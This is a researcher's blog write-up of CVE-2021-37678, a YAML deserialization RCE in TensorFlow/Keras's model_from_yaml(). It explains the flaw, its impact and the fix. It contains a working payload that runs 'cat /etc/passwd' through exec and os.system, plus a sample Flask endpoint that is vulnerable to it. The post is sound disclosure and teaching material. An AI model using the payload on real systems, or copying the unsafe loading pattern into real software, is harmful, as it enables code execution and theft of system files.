Back in my college days, I was heavily into security research and playing CTFs. One of the bigger things I stumbled on was an RCE vulnerability in Google’s TensorFlow/Keras that eventually became CVE-2021-37678.

This post is basically a write-up of that journey, partly to document what I did and partly to revive my security brain after working as a Software Engineer for about 3.5 years.

If you’re into Machine Learning, Python internals, or want to see how something seemingly harmless like YAML can blow up into Remote Code Execution — this one’s for you.

Background#

TensorFlow/Keras used to support loading models from YAML using a function called model_from_yaml(). Here’s the GitHub link to the full source file.

Source:

@keras_export('keras.models.model_from_yaml')
def model_from_yaml(yaml_string, custom_objects=None):
  """Parses a yaml model configuration file and returns a model instance.

  Usage:

  >>> model = tf.keras.Sequential([
  ...     tf.keras.layers.Dense(5, input_shape=(3,)),
  ...     tf.keras.layers.Softmax()])
  >>> try:
  ...   import yaml
  ...   config = model.to_yaml()
  ...   loaded_model = tf.keras.models.model_from_yaml(config)
  ... except ImportError:
  ...   pass

  Args:
      yaml_string: YAML string or open file encoding a model configuration.
      custom_objects: Optional dictionary mapping names
          (strings) to custom classes or functions to be
          considered during deserialization.

  Returns:
      A Keras model instance (uncompiled).

  Raises:
      ImportError: if yaml module is not found.
  """
  if yaml is None:
    raise ImportError('Requires yaml module installed (`pip install pyyaml`).')
  # The method unsafe_load only exists in PyYAML 5.x+, so which branch of the
  # try block is covered by tests depends on the installed version of PyYAML.
  try:
    # PyYAML 5.x+
    config = yaml.unsafe_load(yaml_string)
  except AttributeError:
    config = yaml.load(yaml_string)
  from tensorflow.python.keras.layers import deserialize  # pylint: disable=g-import-not-at-top
  return deserialize(config, custom_objects=custom_objects)

And this is how we use the function.

from tensorflow.keras import models

iam_a_poor_harmless_yaml = '''
name: Arjun Shibu
age: 26
status: single
'''

model = models.model_from_yaml(iam_a_poor_harmless_yaml)
print(model)

Seems innocent, right? Just a guy (me), his age, and his relationship status😭. What could possibly go wrong?

Output:

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python3.12/dist-packages/tensorflow/python/keras/layers/serialization.py", line 113, in deserialize
    return generic_utils.deserialize_keras_object(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/dist-packages/tensorflow/python/keras/utils/generic_utils.py", line 650, in deserialize_keras_object
    (cls, cls_config) = class_and_config_for_serialized_keras_object(
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/dist-packages/tensorflow/python/keras/utils/generic_utils.py", line 543, in class_and_config_for_serialized_keras_object
    raise ValueError('Improper config format: ' + str(config))
ValueError: Improper config format: {'name': 'Arjun Shibu', 'age': 26, 'status': 'single'}

Of course, the function would try to deserialize this into a Keras model and fail — because this YAML isn’t a model.

In other words:

  • YAML → Python dictionary
  • Python dictionary → “Let me try to interpret this as a neural network”
  • TensorFlow → “Okay, YAML says your model’s name is Arjun Shibu, it’s 26 layers old, and its training status is single… Hmm… doesn’t look like a Keras model… I’m just gonna crash now.”

So for real use cases, you’d just load an actual model architecture from YAML and continue with your day, right?

Well… not exactly.

Under the hood, Keras was using yaml.unsafe_load() for deserializing the YAML input. The keyword here is unsafe — as in “will literally construct attacker-controlled Python objects”.

Whenever you give developers the power to deserialize anything without restrictions, attackers get the power to do anything too.
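To see the difference concretely, here’s a minimal sketch (assuming PyYAML 5.x is installed) contrasting safe_load() with unsafe_load() on a YAML document carrying a python/* tag:

import yaml

# A YAML document that asks the loader to build an arbitrary Python object.
payload = "!!python/object/apply:os.getcwd []"

# safe_load() refuses to construct python/* tags and raises ConstructorError.
try:
    yaml.safe_load(payload)
except yaml.constructor.ConstructorError as err:
    print("safe_load rejected it:", err.problem)

# unsafe_load() happily calls os.getcwd() while parsing the document.
print("unsafe_load returned:", yaml.unsafe_load(payload))

safe_load() simply has no constructor registered for python/* tags; unsafe_load() does, and that’s the whole problem.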

The Vulnerability#

The issue was simple but severe:

  • TensorFlow/Keras used yaml.unsafe_load() internally.
  • unsafe_load() allows arbitrary Python object creation.
  • An attacker could provide a crafted YAML file.
  • When the victim (for example, a server that accepts uploaded YAML model configs and parses them; see the sketch below) loaded it using model_from_yaml(), arbitrary code execution could occur.

The vulnerability is a classic CWE-502: Deserialization of Untrusted Data.
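To make that scenario concrete, here’s a hypothetical victim service (the framework, route, and endpoint name are my own illustration, not something from the advisory): a small Flask app that accepts a model architecture upload and rebuilds it with model_from_yaml().

from flask import Flask, request
from tensorflow.keras import models

app = Flask(__name__)

# Hypothetical model-ingestion endpoint: anyone who can POST here controls
# the YAML string that reaches model_from_yaml().
@app.route("/upload-model", methods=["POST"])
def upload_model():
    yaml_string = request.data.decode("utf-8")
    # On vulnerable TensorFlow versions this call ends up in yaml.unsafe_load(),
    # so a crafted upload executes code inside this server process.
    model = models.model_from_yaml(yaml_string)
    return {"num_layers": len(model.layers)}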

Here’s an example of the kind of malicious payload that could be used:

from tensorflow.keras import models

iam_not_that_harmless_yaml = '''
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
'''

models.model_from_yaml(iam_not_that_harmless_yaml)

What this does:

  • The !!python/object/new:type tag instructs the YAML deserializer to construct a new class via type(), named 'z', with no base classes and a class dict that maps extend to Python’s built-in exec.
  • Because the document also supplies listitems, PyYAML then calls extend() on the freshly built object, and that call is now just exec().
  • The listitems string is the code that gets executed: it runs the UNIX command cat /etc/passwd through Python’s os.system() function.

If fed into model_from_yaml(), it would execute the code in the running process — instant RCE. No GPU required.
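To make the mechanism clearer, here’s roughly the plain-Python equivalent of what PyYAML ends up doing for that payload (a sketch, with the command swapped for a harmless echo):

# !!python/object/new:type with those args builds a throwaway class whose
# `extend` attribute is the exec builtin ...
cls = type('z', (), {'extend': exec})
# ... and the listitems handling then calls extend() on it, i.e. exec().
cls.extend("__import__('os').system('echo this could have been cat /etc/passwd')")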

Impact#

If someone could trick you or an automated system into loading a malicious YAML model:

  • They could execute any system command the process has permission to run.
  • They could read sensitive files, perform lateral movement, or subvert CI/CD and training pipelines.
  • Shared research environments, model-serving endpoints, or automated model ingestion services are particularly at risk.

This wasn’t theoretical — it was practically exploitable and carried real-world impact.

The Fix#

The TensorFlow maintainers chose a straightforward and safe approach: removing YAML-based model loading support entirely.

YAML deserialization support was dropped, with the fix shipping in TensorFlow 2.6.0 and backports to 2.5.1, 2.4.3, and 2.3.4.

The recommended alternatives for model serialization are formats that do not allow arbitrary code execution during loading, such as Keras’s JSON-based serialization.
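For example, the JSON path looks almost identical from the caller’s side (a small sketch, assuming a TensorFlow version that still exposes these tf.keras APIs):

import tensorflow as tf

# Build a toy model and serialize its architecture to JSON. JSON can only
# describe data, so loading it back can't construct arbitrary Python objects.
model = tf.keras.Sequential([
    tf.keras.layers.Dense(5, input_shape=(3,)),
    tf.keras.layers.Softmax(),
])
config = model.to_json()

# Rebuild the (uncompiled) model from the JSON string.
restored = tf.keras.models.model_from_json(config)
restored.summary()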

Lessons Learned#

A few takeaways from this work:

  • ML frameworks are large attack surfaces. People often forget that ML tooling interacts with data and artifacts coming from many untrusted sources.
  • Serialization formats can be dangerous. YAML is flexible and powerful, but that flexibility can be abused. Using unsafe_load() on untrusted input is a recipe for disaster.
  • Big projects can have simple but severe flaws. You don’t need to find complex heap corruptions to make a big impact; sometimes one unsafe function call is enough.

Closing thoughts#

This vulnerability was one of the larger things I found during my early security days. It’s a good reminder of why I like this field: understanding how systems behave under the hood and thinking about ways they can be abused.

References#

  1. GitHub Advisory
  2. CVE Record: CVE-2021-37678
  3. BleepingComputer Coverage